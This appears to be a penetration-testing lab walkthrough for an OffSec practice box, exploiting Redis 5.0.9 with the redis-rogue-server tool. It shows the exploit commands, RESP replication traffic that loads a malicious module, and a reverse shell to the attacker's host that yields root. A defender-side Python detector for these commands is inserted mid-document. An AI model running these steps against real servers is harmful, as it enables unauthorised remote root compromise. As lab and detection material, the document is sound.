redis-rogue-server
The target Redis instance runs version 5.0.9. Testing it for the rogue server attack, which abuses Redis's master/slave replication.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/wombo]
└─$ git clone https://github.com/n0b0dyCN/redis-rogue-server ; cd redis-rogue-server
Cloning into 'redis-rogue-server'...
remote: Enumerating objects: 87, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 87 (delta 0), reused 1 (delta 0), pack-reused 83 (from 1)
Receiving objects: 100% (87/87), 245.56 KiB | 3.36 MiB/s, done.
Resolving deltas: 100% (19/19), done.
Downloading the exploit package to Kali
Initially, the exploit just hangs at setting the malicious payload as the dbfilename attribute.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/wombo/redis-rogue-server]
└─$ python3 redis-rogue-server.py --rhost=192.168.209.69 --lhost=192.168.45.192 --lport=80 -v
/home/kali/PEN-200/PG_PRACTICE/wombo/redis-rogue-server/redis-rogue-server.py:10: SyntaxWarning: invalid escape sequence '\ '
BANNER = """______ _ _ ______ _____
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig
[info] TARGET 192.168.209.69:6379
[info] SERVER 192.168.45.192:80
[info] Setting master...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$14\r\n192.168.45.192\r\n$2\r\n80\r\n'
[->] b'+OK\r\n'
[info] Setting dbfilename...
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
[->] b'+OK\r\n'
[->] b'*1\r\n$4\r\nPING\r\n'
[<-] b'+PONG\r\n'
[->] b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$4\r\n6379\r\n'
[<-] b'+OK\r\n'
[->] b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
[<-] b'+OK\r\n'
[->] b'*3\r\n$5\r\nPSYNC\r\n$40\r\n3aae58126d66cbc6f20171a1c4455492f1063543\r\n$1\r\n1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$44320\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\xa6\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[info] Loading module...
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b'-ERR Error loading the extension. Please check the server logs.\r\n'
[info] Temerory cleaning up...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
[->] b'+OK\r\n'
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$11\r\nrm ./exp.so\r\n'
[->] b'$0\r\n\r\n'
What do u want, [i]nteractive shell or [r]everse shell:
However, running the exploit again with a different rogue Redis server port on Kali works. This suggests that there may be a firewall in place.
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 192.168.45.192
Reverse server port: 27017
[info] Reverse shell payload sent.
[info] Check at 192.168.45.192:27017
[info] Unload module...
Leveraging the supplied exp.so file, I can invoke a reverse shell.
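As an added example from the defender's side (my own code, not part of this write-up or the redis-rogue-server tool), the following parses the RESP frames seen in the trace above and flags the three commands the technique depends on: SLAVEOF to an untrusted master, dbfilename pointed at a shared object, and MODULE LOAD. The sample frames are constructed to mirror the [<-] lines above; the trusted_masters parameter is an assumption for an environment that uses legitimate replication.

```python
# Added example: minimal RESP array parser plus a detector for the
# rogue-server command sequence. Not code from the original post.

def parse_resp_array(frame):
    """Decode one RESP array of bulk strings into a list of str."""
    if not frame.startswith(b"*"):
        raise ValueError("not a RESP array")
    pos = frame.index(b"\r\n")
    count = int(frame[1:pos])
    pos += 2
    items = []
    for _ in range(count):
        if frame[pos:pos + 1] != b"$":
            raise ValueError("expected bulk string at offset %d" % pos)
        end = frame.index(b"\r\n", pos)
        length = int(frame[pos + 1:end])
        start = end + 2
        items.append(frame[start:start + length].decode("utf-8", "replace"))
        pos = start + length + 2  # skip payload and its trailing CRLF
    return items

def rogue_server_indicators(frames, trusted_masters=()):
    """Return (reason, command) pairs for frames matching the technique."""
    findings = []
    for frame in frames:
        cmd = parse_resp_array(frame)
        name = cmd[0].upper()
        args = [a.upper() for a in cmd[1:]]
        # SLAVEOF/REPLICAOF NO ONE is the normal reset; anything else
        # redirects replication to a master, which must be one we expect.
        if name in ("SLAVEOF", "REPLICAOF") and args[:2] != ["NO", "ONE"]:
            if len(cmd) > 1 and cmd[1] not in trusted_masters:
                findings.append(("replication redirected to untrusted master", cmd))
        elif name == "CONFIG" and args[:2] == ["SET", "DBFILENAME"]:
            if len(cmd) > 3 and cmd[3].lower().endswith(".so"):
                findings.append(("dbfilename set to a shared object", cmd))
        elif name == "MODULE" and args[:1] == ["LOAD"]:
            findings.append(("runtime module load", cmd))
    return findings

# Constructed sample: the commands the rogue server sent in the trace above,
# including the clean-up frames that must not be flagged.
SAMPLE_FRAMES = [
    b"*3\r\n$7\r\nSLAVEOF\r\n$14\r\n192.168.45.192\r\n$2\r\n80\r\n",
    b"*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n",
    b"*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n",
    b"*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n",
    b"*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n",
]
```

The same check can run over RESP frames captured on port 6379; on the instance itself, renaming or disabling CONFIG, SLAVEOF/REPLICAOF and MODULE via rename-command or ACLs removes the preconditions outright.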
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/wombo/redis-rogue-server]
└─$ nnc 27017
listening on [any] 27017 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.209.69] 35654
whoami
root
hostname
wombo
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:be:da brd ff:ff:ff:ff:ff:ff
inet 192.168.209.69/24 brd 192.168.209.255 scope global ens192
valid_lft forever preferred_lft forever
Initial foothold established on the target system as the root account via the rogue server attack.
System level compromise